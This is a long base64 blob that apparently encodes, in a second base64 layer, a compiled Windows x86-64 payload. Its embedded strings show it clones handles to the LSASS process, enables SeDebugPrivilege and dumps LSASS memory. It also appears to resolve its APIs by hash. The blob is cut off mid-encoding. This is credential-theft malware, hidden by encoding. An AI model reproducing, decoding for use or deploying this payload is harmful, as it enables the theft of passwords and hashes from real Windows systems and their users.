QUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9nZEJRQUE2eGNQSHdCTUFmTVBndk1BQUFCSWk1d2tFQUlBQUV3QjgwaUxqQ1NnQVFBQVFia3dBQUFBU1lub1NJbmEvNWJZQUFBQVNJWEFENFRGQUFBQWdid2tNQUlBQUFBUUFBQk1pN1FrS0FJQUFIVzBUSXU4SlBnQkFBQklpN3drRUFJQUFFMkYvdytFT2dRQUFJdUVKQUFDQUFDTGxDUUVBZ0FBT2RBUGdod0VBQUJNaTVhWUFBQUFBZEtKbENRRUFnQUFpVlFrUEV5SlZDUXcvNWFJQUFBQVJJdE1KRHhOaWZneDBreUxWQ1F3U0luQlNjSGhCRUgvMGttSngwaUpoQ1Q0QVFBQVRZWC9ENFFTQkFBQWk0UWtBQUlBQUVpTGpDUW9BZ0FBaWNLRHdBRkl3ZUlFU1FIWFRZbDNDRW1Kemt3QjgwbUpQNG1FSkFBQ0FBQVBndzMvLy8rTGhDUUFBZ0FBaTVRazRBRUFBRVV4eVVVeHdNZUVKS1FBQUFBSkFBQUFqVWdCU0ltRUpQQUFBQUNKejRtVUpLd0FBQUJJaTR3azJBRUFBTUhuQkkwRU9vbDhKR0JJaVlRaytBQUFBUCtXb0FBQUFFaUpkQ1FnVElucVNZbnBTSXVNSk5nQkFBQkJ1QWdBQUFCRk1lM29xQU1BQUl1RUpPQUJBQUJGTWNsRk1jQklpNHdrMkFFQUFJMVFDSW1VSk9BQkFBRC9scUFBQUFCSWlYUWtJRW1KNlVpTGpDVFlBUUFBU0kyVUpQZ0FBQUJCdUFnQUFBRG9ZQU1BQUl1RUpPQUJBQUNOZUFpTGhDUUFBZ0FBaVh3a1BFR0p4a0hCNWdSQkFmNUVpYlFrNEFFQUFJWEFENFNnQVFBQVJJbHNKREJJaTN3a1VBOGZnQUFBQUFCRWkzd2tNRVV4eVVVeHdFVXg3VWlMaENUNEFRQUFTSXVNSk5nQkFBQkp3ZWNFVEFINFNJc1FTSXRBQ0VpSmxDUWdBUUFBVElueVNJbUVKQ2dCQUFEL2x1QUFBQUJJaTRRaytBRUFBRXdCK0VpTFdBaEloZHQxSnVuU0FBQUFacEJJaTRRaytBRUFBRW1CeFFBRUFBQk1BZmhJaTFnSVREbnJENGF4QUFBQVNZblpSQ25yVFNucFNZSDUvd01BQUhZTFFia0FCQUFBdXdBRUFBQklpeEJNaVdRa0lFbUo2RWlMakNTZ0FRQUFTTWVFSkxBQUFBQUFBQUFBVEFIcTZEM3ovLytGd0hXWlNJbDBKQ0JKaWZsQmlkaElpZXBJaTR3azJBRUFBT2crQWdBQTZYbi8vLzltRHgrRUFBQUFBQUJJQWNJNVNsQVBoTUgxLy8rTEFvWEFkZTVJaTc2UUFBQUEvNWFJQUFBQVNZbllNZEpJaWNILzF6SEFTSUhFR0FZQUFGdGVYMTFCWEVGZFFWNUJYOE9RaTF3a1BFaUxqQ1RZQVFBQVJUSEpSVEhBVEFPMEpDZ0JBQUNKMm9QREVQK1dvQUFBQUVpSmRDUWdTSXRVSkVCTmllRklpNHdrMkFFQUFFRzRFQUFBQU9pckFRQUFnMFFrTUFHTFJDUXdpVndrUER1RUpBQUNBQUFQZ25IKy8vK0xSQ1JnU0l1TUpOZ0JBQUJGTWNsRk1jQ0poQ1NvQUFBQWk0UWszQUFBQUkxUUdQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9oSUFRQUFpNFFrM0FBQUFFVXh5VVV4d0VpTGpDVFlBUUFBalZBay81YWdBQUFBU0lsMEpDQklpNHdrMkFFQUFFbUo2VWlObENTWUFBQUFRYmdNQUFBQTZBY0JBQUJJaTd3azZBRUFBRWlMbnBBQUFBRC9sb2dBQUFBeDBrbUorRWlKd2YvVFNJdThKUGdCQUFCSWk1NlFBQUFBLzVhSUFBQUFNZEpKaWZoSWljSC8wMGlMdkNUQUFRQUFTSXVla0FBQUFQK1dpQUFBQURIU1NZbjRTSW5CLzlOSWk3d2tzQUVBQUVpTG5wQUFBQUQvbG9nQUFBQXgwa2lKd1VtSitQL1R1QUVBQUFEcGZQNy8vMHlKOGVrMy9QLy9USXUrZ0FBQUFNZUVKQVFDQUFBZ0FBQUEvNWFJQUFBQVFiZ0FBZ0FBTWRKSWljRkIvOWRKaWNkSWlZUWsrQUVBQUUyRi93K0Y3dnYvLzBqSGhDUUFBZ0FBQUFBQUFFeUx0Q1FvQWdBQTZRNzcvLytMUkNSZ3gwUWtaQVFBQUFESGhDU0VBQUFBQUFBQUFJUEFCSW1FSk9BQkFBRHBZUHIvLzBGV1RZbk9RVlZKaWMxQlZGVlhTSW5YVmxORWljTklnK3d3VEl1a0pKQUFBQUJKaTdRa2dBQUFBRUgvbENTSUFBQUFNZEpKaWRoSWljSC8xa2lGd0ErRWd3QUFBRWlKM1VpSnhvWGJkQzB4d0E4ZmdBQUFBQUFQdGhRSGlCUUdTSVBBQVVnNXczWHdTSW53U0FIelpwQ0FNRUZJZzhBQlNEbkRkZlJCaWVoSWlmSk1pZWxOaWZGSXgwUWtJQUFBQUFCQi8xUWtlRW1MbkNTUUFBQUFRZitVSklnQUFBQklnOFF3U1lud01kSklpY0ZJaWRoYlhsOWRRVnhCWFVGZS8rQVBINEFBQUFBQVNJUEVNRnRlWDExQlhFRmRRVjdEa0pDUWtKQ1FrSkNRUVZjeHdFRldRVlZCVkZWWFZraUp6cmtlQUFBQVUwaUI3RmdIQUFCSWpid2tRQUVBQUV5SmhDU3dCd0FBODBpcnVSNEFBQUJJeDBRa1lBQUFBQUJJeDBRa2FBQUFBQURIaENTd0FBQUFNQUFBQUVqSGhDUzRBQUFBQUFBQUFNZUVKTWdBQUFBQUFBQUFTTWVFSk1BQUFBQUFBQUFBeHdjQUFBQUFTSTI4SkZBQ0FBRHpTS3RJdUZBQWNnQnZBR01BU01lRUpOQUFBQUFBQUFBQVNJbUVKSUFBQUFCSXVHVUFjd0J6QUFBQVNJbUVKSWdBQUFDNGN3QUFBRWpIaENUWUFBQUFBQUFBQUVqSFJDUndBQUFBQUVqSFJDUjRBQUFBQUVqSGhDUXdBUUFBQUFBQUFFakhoQ1E0QVFBQUFBQUFBRWpIaENSQUFnQUFBQUFBQUVqSGhDUklBZ0FBQUFBQUFNY0hBQUFBQU1kRUpGcHNjMkZ6Wm9sRUpGNkxEb1hKRDRTVkF3QUFpZFZOaWN3eDIwVXgvMFV4OXVzT0R4OEFnOE1CT1I0UGhqMERBQUNKMzRYdGRBcElqUVIvT1d6R0NIWGxTSTBFZjR0RXhoZzlBQUFRQUErVndUMkpBUklBRDVYQ2hORjB5U1gvLy9mL1BaOEJFZ0IwdlUyRjluUVFRYmdBZ0FBQU1kSk1pZkZCLzFRa09FaU5CSDlJalV3a2FMcEFCQUFBU01kRUpIZ0FBQUFBVEkwc3hreU5UQ1J3UVl0RkNFeU5oQ1N3QUFBQVNJbEVKSERvUE9mLy8wRVB0MVVPeDBRa01BQUFBQUJNalV3a1lNZEVKQ2dBQUFBQVNJdE1KR2hKeDhELy8vLy94MFFrSUJBRUFBRG9QZVQvLzBHNUJBQUFBRUc0QUJBQUFESEp1Z0FRQUFCQi8xUWtTRW1KeGtpRndBK0VHLy8vLzBpTFRDUmdRYmtBRUFBQVNZbkF1Z0lBQUFCSXgwUWtJQUFBQUFEbzl1ci8vNFhBRDRqeS92Ly9TWXRPQ0VpTmxDU0FBQUFBUWY5VUpGQ0Z3QStGMmY3Ly8waU52Q1F3QVFBQU1kSklpMHdrWUVHNUJBRUFBRW1KK0VIL1ZDUmdoY0FQaExUKy8vOUlqWVFrUUFJQUFFaUxUQ1JvUWJnRUFRQUFTSWxFSkVoSWljSkIvMVFrYUlYQUQ0U00vdi8vU0kxVUpGcElpZmxCLzFRa1dFaUZ3QStFZHY3Ly8wSDNSUmdRQkFBQUQ0Um8vdi8vU0l0TUpFaElqYndrWUFNQUFFeU52Q1JRQlFBQVFmOVVKSEM1UGdBQUFFeUxSQ1J3U0xwa0lHRnVaQ0J6ZFVtSndVaTRXeXRkSUVadmRXNUlpWlFrNkFBQUFFaTZiSGtnWTJ4dmJtVklpWVFrNEFBQUFFaTRZMk5sYzNObWRXeElpWVFrOEFBQUFFaTRaQ0JvWVc1a2JHVklpWVFrQUFFQUFFaTRJR3h6WVhOeklHbElpWVFrRUFFQUFFaTRDVnNyWFNCSVlXNUlpWVFra0FBQUFFaTRkSE02SUNWNENnQklpWVFrb0FBQUFESEE4MGlyU0ltVUpQZ0FBQUJJamJ3a1lBVUFBRWk2SUNnbFpDa2dkRys1UGdBQUFFaUpsQ1FJQVFBQVNMcHVPaUFsY3lBb0pmTklxMGlKbENRWUFRQUFTSTI4SkZBREFBQkl1bVJzWlNCU2FXZG9TSW1VSkpnQUFBQklpZmxJalpRazRBQUFBRXlKUkNRZ3g0UWtJQUVBQUdRcENnQkl4NFFrVUFNQUFBQUFBQUJJeDRRa1dBTUFBQUFBQUFCSXg0UWtVQVVBQUFBQUFBQkl4NFFrV0FVQUFBQUFBQUJCLzFRa0dFV0xSUmhNaWZsSWpaUWtrQUFBQUVIL1ZDUVlTSXVNSkxBSEFBQklpZnBCLzFRa0NFeUora2lMakNTd0J3QUFRZjlVSkFoTWkzd2tZSVh0ZFZsTWlmbUR3d0ZCLzFRa0tEa2VENGZKL1AvL1pnOGZSQUFBU0l0TUpHaEloY2wwQlVIL1ZDUW9UWVgyZEJCQnVBQ0FBQUF4MGt5SjhVSC9WQ1E0U0lIRVdBY0FBRXlKK0Z0ZVgxMUJYRUZkUVY1Qlg4TkZNZi9yNUVpTFRDUm9TSVhKZGNEcnlKQ1FrSkJCVjBtSjEwRldUWW5HUVZWQmljMU1pY2xCVkZOTWljdElnZXl3QUFBQTZPd0xBQUJJaGNBUGhGTUJBQUJFaWVwSmlkbE5pZmhJaWNGSmljVG83L3IvLzBtSnhVaUZ3QStFa3dJQUFFaTRXeXBkSUU1dmR5Qk1pZm5HUkNSaUFFaTZkSEo1YVc1bklIUklpVVFrUUVpNGJ5QmtkVzF3SUd4SWlWUWtTRWk2YzJGemN5QXVMaTVJaVVRa1VMZ2dDZ0FBU0lsVUpGaElqVlFrUUdhSlJDUmcvMU1JVElueFJUSEpSVEhBU01kRUpEQUFBQUFBdWdBQUFFREhSQ1FvZ0FBQUFNZEVKQ0FDQUFBQS8xTWdTWW5HU0lQNC93K0VGZ0VBQUV5SjZmOVRNRW1KMlUySjhFeUo2WW5DNkxEci8vK0Z3QStFZUFFQUFFaTRXeXRkSUV4ellYTk1pZmxJdW5NZ1pIVnRjQ0JweDRRa2lBQUFBSFJsQ2dCSWlVUWtjRUcvQVFBQUFFaTRjeUJqYjIxd2JHVklpVlFrZUVpTlZDUndTSW1FSklBQUFBRC9Vd2hOaGZaMEJreUo4ZjlUS0V5SjZmOVRLRUc0QUlBQUFESFNUSW5oLzFNNFNJSEVzQUFBQUVTSitGdEJYRUZkUVY1Qlg4Tm1EeCtFQUFBQUFBQkl1RnN0WFNCR1lXbHNUSW41U0xwbFpDQjBieUJuWmNlRUpKQUFBQUJzWlhNS1NJbEVKSEJGTWY5SXVIUWdZU0JzYVhOMFNJbFVKSGhJdWlCdlppQm9ZVzVrU0ltVUpJZ0FBQUJJalZRa2NFaUpoQ1NBQUFBQXhvUWtsQUFBQUFEL1V3anBlLy8vL3c4ZmhBQUFBQUFBU0xoYkxWMGdRMjkxYkV5SitVaTZaQ0J1YjNRZ2QzTEhoQ1NZQUFBQWFXeGxDa2lKUkNSd1JUSC9TTGhwZEdVZ2RHOGdjMGlKVkNSNFNMcHdaV05wWm1sbFpFaUpoQ1NBQUFBQVNMZ2diM1YwY0hWMFpraUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBTWFFSkp3QUFBQUEvMU1JNmQvKy8vOW1EeDlFQUFCSXVGc3RYU0JUYjIxbFRJbjVSVEgvU0xwMGFHbHVaeUIzWlVpSlJDUndTTGh1ZENCM2NtOXVaMGlKVkNSNFNMb2dkMmhwYkdVZ1pFaUpoQ1NBQUFBQVNMaDFiWEJwYm1jS0FFaUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBUDlUQ09sdC92Ly9aZzhmaEFBQUFBQUFTTGhiTFYwZ1EyOTFiRXlKK1VpNlpDQnViM1FnWm1uSGhDU2dBQUFBYVdRS0FFaUpSQ1J3UlRIL1NMaHVaQ0JoY0hCeWIwaUpWQ1I0U0xwd2NtbGhkR1VnYUVpSmhDU0FBQUFBU0xoaGJtUnNaU0JwYmtpSmxDU0lBQUFBU0xvZ1oybDJaVzRnY0VpSmxDU1lBQUFBU0kxVUpIQklpWVFra0FBQUFQOVRDT254L2YvL2tKQ1FrSkNRa0pDUWtKQ1FRVmU0cUJVQUFFRldRVlZCVkZWWFZsUG9hdHovLzBHNEFCQUFBRWdweEVtSnpESEF1UUFDQUFCSWpid2tvQVVBQUVpTm5DU2dBUUFBU0luVlNNZEVKSEFBQUFBQTgwaXJ1VUFBQUFCSWlkOU1qYlFrb0FNQUFQTklxMHlKOTdsQUFBQUFTSTIwSktBRkFBRHpTS3RNalV3a1pFaUo4a21MVENRUVNNZEVKSGdBQUFBQVNNZUVKSUFBQUFBQUFBQUF4MFFrWkFBQUFBRC9sUkFCQUFDTFJDUmtTSTJNSkpBQUFBQklpVXdrT01Ib0E0bEVKR1FQaElJQkFBQk1qWHdrY0RIL1RJbjRUWW4zU1luR0R4OUFBRW1MVENRUVNJc1dRYmtZQUFBQVRZbncvNVVZQVFBQWhjQVBoRDRCQUFCSmkwd2tFRWlMRmtHNUFBRUFBRW1KMlArVklBRUFBSVhBRDRRZkFRQUFTTGd1QUhNQWJ3QUFBRWlKMmNlRUpKZ0FBQUErQUFBQVNJbEVKR2hJdUR3QVpRQnNBR1lBU0ltRUpKQUFBQUQvbGNnQUFBQkltRXlOREVOSmpWSCtTRG5hY3gvcHZnSUFBR1lQSDRRQUFBQUFBSVA0TDNRVVNJMUMva2c1MkhJUFNJbkNEN2NDZy9oY2RlZElnOElDU1NuUnVmOEFBQUJCdVA4QUFBQk5pYzFNaVV3a0tFblIvVW1CK2Y4QkFBQk1EMGZwVEluNVM0MUVMUUJJaVVRa1FFd0IrRWlKUkNRdy8xVUFTSXRFSkRCTWkwd2tLREhKWm9rSVNZUDVDQStIaGdBQUFFbUQrUVlQaDVVQUFBQk1pZnJyQ3c4ZmdBQUFBQUJJZzhJQ0Q3Y0NSSTFBdjQxSUlHWkJnL2dhRDBMQlpva0Nab1hBZGVKTWkyd2tjSXRFSkhoSmkwd2tFRXlMUkNRNFRJbnFpVVFrS09nTERRQUFoY0FQaFpNQUFBQ0R4d0ZJZzhZSU9Yd2taQStIa3Y3Ly8waUJ4S2dWQUFCYlhsOWRRVnhCWFVGZVFWL0RaZzhmUkFBQVNZbm9USW5xVEluNTZOb0pBQUJJbUVpRndBK0ZQd0VBQUVpTFJDUkFTSTFVSkdoSmpVd0grditWS0FFQUFJWEFENFZPLy8vL1NZMVYvVW1KNkV5SitlaWpDUUFBU0poSWhjQVBoRFQvLy85SktjVklpMVFrT0V1TlRHLzYvNVVBQVFBQTZSei8vLytMaENUb0FBQUFUWXRFSkRDSlJDUXdpNFFrbUFBQUFJbEVKRUJOaGNBUGhPUUFBQUJCaTBRa09FR0xWQ1E4T2RCeVZVeUxuWmdBQUFBQjBreUpSQ1JZUVlsVUpEeUpWQ1JVVElsY0pFai9sWWdBQUFDTFZDUlVUSXRFSkZoTWkxd2tTRWlKd1V4cHlpZ0NBQUF4MGtILzAwbUp3RW1KUkNRd1RZWEFENFRGQUFBQVFZdEVKRGhJYWNBb0FnQUFTWXRNSkJCTWllcEJ1UVFCQUFCTmpVUUFIUCtWQ0FFQUFFR0xSQ1E0aTB3a0tFaUp3a2hwd0NnQ0FBQkpBMFFrTUlsSUVJdE1KRUNEd2dGTWlXZ0lpVWdVaTB3a01NY0FBQUFBQUlsSUdFR0pWQ1E0NlliKy8vOW1EeCtFQUFBQUFBQkpLY1V4MG1aQ2laUnNvQU1BQU9rWi92Ly9EeDlFQUFCQngwUWtQQ0FBQUFCTWk0MkFBQUFBVElsTUpFai9sWWdBQUFCQnVBQkZBQUJNaTB3a1NESFNTSW5CUWYvUlNZbkFTWWxFSkRCTmhjQVBoVHYvLy85SngwUWtPQUFBQUFEcEdQNy8vMEc0L3dBQUFFeUp5a3lKK2Y5VkFESEFab21FSktBREFBRHBxZjMvLzVDUWtKQ1FrSkNRa0pDUWtKQkJWYnA4WWZST1FWUkppY3k1WTlkUDVsZElnZXhRQWdBQTZJSUNBQUJJaGNBUGhIc0JBQUJKaWNDNExnQUFBRWlOZkNSQXVSNEFBQUJtaVVRa0xqSEFRUSsyRkNUelNLdTVIZ0FBQUVqSFJDUXdBQUFBQUVqSFJDUTRBQUFBQUVqSGhDUkFBUUFBQUFBQUFFakhoQ1JJQVFBQUFBQUFBTWNIQUFBQUFFaU52Q1JRQVFBQTgwaXJ4d2NBQUFBQWhOSjBHbVlQSDBRQUFBKzJ5RWlEd0FHSVZBd3dRUSsyRkFTRTBuWHNUSTFrSkRCSWpWUWtMa3lKNFVILzBFbUp3RWlGd0ErRTJnQUFBQSsyVUFIR0FBQ0UwZytFQ1FFQUFESEFEeCtBQUFBQUFBKzJ5RWlEd0FHSWxBeEFBUUFBUVErMlZBQUJoTkoxNkErMmhDUkFBUUFBaE1BUGhOZ0FBQUJNallRa1FRRUFBTGtGRlFBQUR4OEFpY3BKZzhBQndlSUZBZEFCd1VFUHRrRC9oTUIxNm9IeFJFTkNRVUdKelErMlJDUXdoTUFQaEtjQUFBQk1qVVFrTWJrRkZRQUFacENKeWttRHdBSEI0Z1VCMEFIQlFRKzJRUCtFd0hYcWdmRkVRMEpCNkk4QUFBQklpY0ZJaGNCMEYwU0o2dWl2Q0FBQVNJSEVVQUlBQUY5QlhFRmR3MmFRdVRHdEFqSG9aZ0FBQUVpSndVaUZ3SFVXTWNCSWdjUlFBZ0FBWDBGY1FWM0REeCtBQUFBQUFMcS9zLzBlNkc0SUFBQkloY0IwMjB5SjRmL1FTSW5CU0lYQWRhVXh3T3ZNRHgrRUFBQUFBQUJCdlVGV1FrSHBUUC8vLzdsQlZrSkI2WGYvLy8rUWtKQ1FrSkNRa0pDUWtHVklpd1FsWUFBQUFFaUxRQmlCOFVSRFFrRkJpY3BNaTFnZ1RZblpEeDhBU1l0SlVFaUZ5WFJqRDdjQlpvWEFkRjlJaWNvUEgwQUFSSTFBdjJaQmcvZ1pkd2FEd0NCbWlRSVB0MElDU0lQQ0FtYUZ3SFhpRDdjQlpvWEFkREpCdUFVVkFBQVBIMEFBUkluQ1NJUEJBc0hpQlFIUVFRSEFEN2NCWm9YQWRlbEZPY0owRjAyTENVMDV5M1dVTWNERGtFRzRCUlVBQUVVNXduWHBTWXRCSU1OQlZFR0oxRk9KeTBpRDdGam9ULy8vLzBpRndIVWl1VEd0QWpIb1FQLy8vMGlKd1VpRndIVW9TSVBFV0RIQVcwRmN3MllQSDBRQUFFaUR4RmhFaWVKSWljRmJRVnpwUmdjQUFHWVBIMFFBQUxxL3MvMGU2RFlIQUFCSWhjQjB5WUg3bCt4Ym1BK0VoUUFBQUlIN0RjbGlKZytFNlFBQUFJSDdZOWRQNWcrRXRRQUFBSUg3aUNiNEFBK0VBUUVBQUlIN3V3N085WFdSU0xwQmNHa3RiWE10ZDhaRUpFSUFTTGxwYmkxamIzSmxMVWlKVkNRZ1NMcDJaWEp6YVc5dUxVaUpUQ1FvU0xsc01TMHhMVEF1WkVpSlZDUXd1bXhzQUFCSWlVd2tPRWlOVENRZ1pvbFVKRUQvMEVpSndlc3NacEJCdUd4c0FBQklqVXdrSU1aRUpDb0FTTHRWYzJWeU16SXVaRWlKWENRZ1prU0pSQ1FvLzlCSWljRkloY2tQaEFYLy8vOUlnOFJZUkluaVcwRmM2VjRHQUFCbUR4OUVBQUJJdTFOb2JIZGhjR2t1U0kxTUpDREhSQ1FvWkd4c0FFaUpYQ1FnLzlCSWljSHJ2dzhmUkFBQVNMdEJaSFpoY0drek1raU5UQ1FneGtRa0xBQklpVndrSU1kRUpDZ3VaR3hzLzlCSWljSHJrZzhmaEFBQUFBQUFTTHRRYzJGd2FTNWtiTGxzQUFBQVpvbE1KQ2hJalV3a0lFaUpYQ1FnLzlCSWljSHBZdi8vLzVDUWtKQ1FrSkNRUVZSRk1jQkZNZVJXVTBpSnkwaUQ3RERIUkNRc0FBQUFBRWlOZENRc1NZbnhUSW5pdVJBQUFBRG9qTjMvLzRYQWVRbzlCQUFBd0hRWFJUSGtTSVBFTUV5SjRGdGVRVnpERHgrRUFBQUFBQUJOaGVSMERrRzRBSUFBQURIU1RJbmgvMU00UWJnQUVBQUFpMVFrTEVHNUJBQUFBREhKLzFOSVJJdEVKQ3hKaWNUcm5KQ1FrSkNRa0pDUWtKQ1FrSkNRUVZkQlZrV0p4a0ZWVFluTlFWUlZNZTFYU0lub1Zvbk91U2NBQUFCVFNJblRTSUhzeUFVQUFFaU52Q1NBQUFBQVRJMjhKSUFBQUFEelNLdE1pZm5vN1FZQUFFR0p4SVhBZFI1SWdjVElCUUFBUkluZ1cxNWZYVUZjUVYxQlhrRmZ3dzhmZ0FBQUFBQk1pZm5vQUEwQUFFR0p4SVhBRDRRZEFnQUFoZllQaE1VQUFBQkl1RnNxWFNCRGFHVmpUSW5wU0xwcmFXNW5JR1p2Y3NhRUpBQUVBQUFBU0ltRUpNQURBQUJCdkFFQUFBQkl1Q0J3Y205alpYTnpTSW1VSk1nREFBQkl1bVZ6SUhkcGRHZ2dTSW1FSk5BREFBQkl1R0VnYzNWcGRHRmlTSW1VSk5nREFBQkl1bXhsSUdoaGJtUnNTSW1FSk9BREFBQkl1R1VnZEc4Z2JITmhTSW1VSk9nREFBQkl1bk56SUM0dUxpQUtTSW1VSlBnREFBQklqWlFrd0FNQUFFaUpoQ1R3QXdBQS81UWtpQUFBQUV5SitreUo2ZWhDQlFBQTZRZi8vLzhQSDBRQUFFaU52Q1RRQVFBQXVUNEFBQUJGaWZER1JDUnlBRWk0V3lwZElFRjBkR1ZJdW0xd2RHbHVaeUIwU01lRUpNQURBQUFBQUFBQVRJMmtKTUFEQUFCSWlVUWtRRWlOdENUQUFRQUFTTGh2SUdOc2IyNWxJRWlKUkNSUVNMaHVaR3hsSUdaeWIwaUpSQ1JndUdRS0FBQm1pVVFrY0VpNFd5cGRJRTkxZEdaSWlVUWtJRWlKNlBOSXEwaUpWQ1JJdVQ0QUFBQkl1bXh6WVhOeklHaGhTSTI4Sk5BREFBQklpVlFrV0VpNmJTQndhV1E2SUNWSXg0UWt5QU1BQUFBQUFBRHpTS3RJaWZGSWlWUWthRWk2YVd4bE9pQWxjd3BJaVZRa0tFaU5WQ1JBeGtRa01BQkl4NFFrd0FFQUFBQUFBQUJJeDRRa3lBRUFBQUFBQUFEL2xDU1lBQUFBU1luWVRJbmhTSTFVSkNEL2xDU1lBQUFBU0lueVRJbnAvNVFraUFBQUFFeUo0a3lKNlVHOEFRQUFBUCtVSklnQUFBQk5pZmxKaWRoTWllcEVpZkhvMVBELy8rbTUvZi8vRHgrQUFBQUFBRWk2WkNCdWIzUWdaVzVNaWVsSXVGc3RYU0JEYjNWc3g0UWs0QU1BQUd4bFoyVklpWlFreUFNQUFFaTZkV2NnY0hKcGRtbElpWVFrd0FNQUFFaTRZV0pzWlNCRVpXSklpWlFrMkFNQUFMb0tBQUFBWm9tVUpPUURBQUJJalpRa3dBTUFBRWlKaENUUUF3QUEvNVFraUFBQUFPazcvZi8va0VGVlJUSEpSVEhTU0xndUFHRUFZd0J0QUVGVVZWZElpYzh4eVZaSWlkWXgwbE5NaWNORk1jQklnZXlvQUFBQVNJbEVKQ1F4d0V5TlpDUWtTSTFzSkdCbWlVUWtMRWk0TGdCa0FHd0FiQUJJaVVRa0xraTRMZ0JrQUhJQWRnQklpVVFrT0VpNExnQmxBSGdBWlFCSWlVUWtRa2k0TGdCdkFHTUFlQUJJaVVRa1RFaTRMZ0IyQUhnQVpBQklpVVFrVmtpTlJDUXVTSWxFSkdoSWpVUWtPRWlKUkNSd1NJMUVKRUpJaVVRa2VFaU5SQ1JNU0ltRUpJQUFBQUJJalVRa1ZtYUpWQ1EyWm9sTUpFQm1SSWxFSkVwbVJJbE1KRlJtUklsVUpGNU1pV1FrWUVpSmhDU0lBQUFBU01lRUpKQUFBQUFBQUFBQVRJbmgvNVBJQUFBQVFZbkZTSmhJT2ZCelBVaUo4a2dwd2tpTkRGZE1pZUwva3lnQkFBQ0Z3SFVaU0lIRXFBQUFBRVNKNkZ0ZVgxMUJYRUZkdzJZUEgwUUFBRXlMWlFoSWc4VUlUWVhrZGJCRk1lM3IxWkNRa0pDUWtFRldRVlZCVkVtSjFGVkVpY1ZYUkluUFZraUp6bE5JZyt3Z1NJdFpXRWlMaENTQUFBQUFTSVhiZEcyTFVXQkVpMGxrUkRuS2NqWkhqU3dKVEl1d21BQUFBRVNKYVdUL2tJZ0FBQUJGaWVsSmlkZ3gwa2lKd1VuQjRRUkIvOVpJaWNOSWlVWllTSVhiZEZ1TFZtQkJpZENEd2dGSndlQUVUQUhEVElramlXc0lpWHNNaVZaZ1NJUEVJRnRlWDExQlhFRmRRVjdERHg4QVNJdVlnQUFBQU1kQlpDQUFBQUQva0lnQUFBQkJ1QUFDQUFBeDBraUp3Zi9UU0luRFNJbEdXRWlGMjNXbFNNZEdZQUFBQUFCSWc4UWdXMTVmWFVGY1FWMUJYc09Ra0pDUVZWZFdVMGhqYVR4SUFjMkx2WWdBQUFCSUFjOUVpMDhnaTNjWVNRSEpoZlowVm9uVFNZbkxSVEhTZ2ZORVEwSkJRWXNCdVFVVkFBQk1BZGhNalVBQkQ3WUFoTUIwSVdZdUR4K0VBQUFBQUFDSnlzSGlCUUhRQWNGTWljQkpnOEFCRDdZQWhNQjE2VG5aZEJSSmc4SUJTWVBCQkV3NTFuVzRNY0JiWGw5ZHc0dFhKRXVOREZPTFJ4d1B0eFFSU1kwVWs0c0VBa3dCMkVnNXgzZmVpNVdNQUFBQVNBSFhTRG40ZDlCYlNJbkJYbDlkNlJyMS8vK1FrSkNRa0pDUWtKQ1FRVlJCdVVBQUFBQkppY3hYVmt5SnhsTklpZE5JZyt4NFNNZEVKQ0FBQUFBQVRJMUVKRERvWmRqLy8waGpWQ1JzU1lud1RJbmhTTWRFSkNBQUFBQUFRYmtJQVFBQWljZElBZHJvUWRqLy8yYUJmQ1F3VFZwMUJBbkhkQlF4d0VpRHhIaGJYbDlCWE1NUEg0UUFBQUFBQURIQWdUNVFSUUFBRDVUQTYrR1FrSkJCVlVtSnpVaUowVUZVVTBpSjAwaUQ3RkRvMmZqLy8waUZ3SFEwU1luRVNZblpUWW5vTWRKSWljSG80ZWYvLzB5SjRVRzRBSUFBQURIUy8xTTRTSVBFVUxnQkFBQUFXMEZjUVYzRER4OUFBRWk0V3kxZElFWmhhV3pIUkNSQWJHVnpDa3lKNlVpNlpXUWdkRzhnWjJWSWlVUWtJRWk0ZENCaElHeHBjM1JJaVZRa0tFaTZJRzltSUdoaGJtUklpVlFrT0VpTlZDUWdTSWxFSkRER1JDUkVBUDlUQ0VpRHhGQXh3RnRCWEVGZHcxTzZ6OC9ZRkVpSnk3a3hyUUl4U0lQc0lPaHA5di8vdWlmby9aTzVNYTBDTVVpSkEraFg5di8vdWs3b2hwTzVNYTBDTVVpSlF3am9SUGIvLzdxSCs5cTV1WmZzVzVoSWlVTVE2REgyLy8rNnZvYlVxcmt4clFJeFNJbERHT2dlOXYvL3VrT0pNbm01TWEwQ01VaUpReURvQy9iLy83cTFoTVFJdVRHdEFqRklpVU1vNlBqMS8vKzZhb3pOSjdreHJRSXhTSWxETU9qbDlmLy91dE5NYm5tNU1hMENNVWlKUXpqbzB2WC8vN3B4ZmU5T3VXUFhUK1pJaVVOSTZMLzEvLys2ZkdIMFRybGoxMC9tU0lsRFVPaXM5Zi8vdWc0S0pLVzVNYTBDTVVpSlExam9tZlgvLzdvdHh4RmZ1VEd0QWpGSWlVTmc2SWIxLy8rNk1SL1pucmxqMTAvbVNJbERhT2h6OWYvL3V2U3ZmaWU1TWEwQ01VaUpRM0RvWVBYLy83cEtKTDlldVRHdEFqRklpVU40NkUzMS8vKzZSazRhaDdreHJRSXhTSW1EZ0FBQUFPZzM5Zi8vdW9IUUNuYTVNYTBDTVVpSmc0Z0FBQURvSWZYLy83cGhnbk5mdVRHdEFqRklpWU9RQUFBQTZBdjEvLys2dGlpdEVya3hyUUl4U0ltRG1BQUFBT2oxOVAvL3VyK3ovUjY1TWEwQ01VaUpnNkFBQUFEbzMvVC8vN3F5ckVyQ3VUR3RBakZJaVlPb0FBQUE2TW4wLy8rNmVJMnNjYmt4clFJeFNJbURzQUFBQU9pejlQLy91a29jQ0lPNU1hMENNVWlKZzdnQUFBRG9uZlQvLzdwazZJYVR1VEd0QWpGSWlZUEFBQUFBNklmMC8vKzZXL2h6anJreHJRSXhTSW1EeUFBQUFPaHg5UC8vdXR1bzBaYTVNYTBDTVVpSmc5QUFBQURvVy9ULy83cUxlamhNdVRHdEFqRklpWVBZQUFBQTZFWDAvLys2elFWQlVMbTdEczcxU0ltRDRBQUFBT2d2OVAvL3VpcTZOcFM1dXc3TzlVaUpnK2dBQUFEb0dmVC8vN29ZMnljNXVic096dlZJaVlQd0FBQUE2QVAwLy8rNnFhajlrN2t4clFJeFNJbUQrQUFBQU9qdDgvLy91aVFLSktXNU1hMENNVWlKZ3dBQkFBRG8xL1AvLzdyVzNKemt1VEd0QWpGSWlZTUlBUUFBNk1Iei8vKzZ0VVQxdDdreHJRSXhTSW1